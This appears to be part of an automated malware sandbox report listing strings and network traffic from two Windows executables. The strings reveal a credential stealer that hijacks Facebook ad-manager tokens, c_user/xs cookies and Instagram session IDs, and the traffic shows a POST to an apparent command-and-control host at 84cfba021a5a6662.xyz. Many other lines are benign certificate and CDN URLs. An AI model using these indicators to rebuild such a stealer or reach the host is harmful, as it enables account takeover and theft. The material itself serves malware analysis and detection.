https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exeString found in binary or memory: http://www.facebook.com/pages/VB-Audio-Software/396002733802606 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exeString found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comT equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comf equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exeString found in binary or memory: qSOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio{83da6326-97a6-4088-9453-a1923f573b29},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},6{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},0{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0FRCFLCBRBLLFFCFRFLIsWow64ProcessKernel32.dllArial-inf db%0.1f db%0.1f %%%i bits%i Hz%i-Input Levelsb1024:b512:b256:b128:Init:Pull loss:Push loss:Buffers:StatisticsOutputres:sr:ch:Input%i smpMax Latency:Internal SR:%i.%i.%i.%iDriver Version:VB-Audio Virtual CableDriver Name:SYSTEM\CurrentControlSet\Services\VB-CableSOFTWARE\VB-Audio\CableVBAudioCableWDM_SRVBAudioCableWDMhttp://www.vb-audio.comhttp://www.facebook.com/pages/VB-Audio-Software/396002733802606The change will take effect on next launch... equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: s://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: s://www.facebook.com/chat/video/videocalldownload.phpbo\\O9 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: 84cfba021a5a6662.xyz
Source: unknownHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz
Source: 56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/D
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/al
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/alD
Source: 56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/f
Source: 56BB1610C0318054.exe, 00000002.00000003.409330449.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/ddd
Source: 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/e
Source: 56BB1610C0318054.exe, 00000002.00000003.391014906.0000000003D78000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/g
Source: 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/r
Source: Cyfj6XGbkd.exe, 00000000.00000002.365614828.0000000000861000.00000004.00000020.sdmp, Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.409330449.0000000003D76000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376093286.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w
Source: 56BB1610C0318054.exe, 00000004.00000002.377383414.00000000005A6000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/wV
Source: 56BB1610C0318054.exe, 00000004.00000003.376093286.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/wd_kb_0x
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/llH
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84CFBA021A5A6662.xyz/llr
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.370858416.00000000007E4000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.377399096.00000000005BB000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz//fine/send
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/e
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/eV
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000004.00000002.377366859.0000000000593000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/w
Source: Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/wI
Source: Cyfj6XGbkd.exe, 00000000.00000002.365614828.0000000000861000.00000004.00000020.sdmpString found in binary or memory: http://84cfba021a5a6662.xyz/info_old/wvx
Source: 56BB1610C0318054.exe, 00000002.00000003.389623868.0000000004129000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: Cyfj6XGbkd.exe, 00000000.00000002.365655774.000000000089B000.00000004.00000020.sdmpString found in binary or memory: http://charlesproxy.com/ssl
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crx
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: 1611970637183.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1611970637183.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1611970637183.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, ecvFEAD.tmp.9.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Cyfj6XGbkd.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 56BB1610C0318054.exeString found in binary or memory: http://docs.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: http://drive.google.com/
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://google.com/chrome
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjIwZTg0ZTY4NTUwZTU4OGJhMzFmNmI5YjE4N2E4NDAyZWVmO
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJhM2VjZmJmYzJjMzAzZjVjMGM1MjhiNDZjYWEyNDY0MGI2M
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA61Ofl?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABzUSt?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsAOZ?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsZuW?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv9IZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhNP?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhax?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvqEs?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvuGs?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvzqT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
